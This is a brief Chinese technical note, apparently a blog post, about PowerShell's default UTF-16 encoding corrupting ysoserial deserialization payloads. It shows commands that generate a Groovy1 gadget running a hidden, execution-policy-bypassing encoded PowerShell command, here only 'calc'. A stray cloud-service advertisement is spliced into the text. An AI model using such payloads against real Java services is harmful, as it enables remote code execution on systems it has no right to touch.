powershell 中文系统默认UTF-16 (LE) UNICODE编码 使用时需小心
现象:
1.cmd生成payload
SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。java -jar ysoserial.jar Groovy1 "powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc YwBhAGwAYwA=" > payload.bin
2.powershell生成payload
java -jar ysoserial.jar Groovy1 "powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc YwBhAGwAYwA=" > payload2.bin
第二次生成:
java -jar ysoserial.jar Groovy1 "powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc YwBhAGwAYwA=" | Out-File -Encoding default payload3.bin
3.结果对比
4.学习
https://wenku.baidu.com/view/768a052b915f804d2b16c149.html
更多精彩
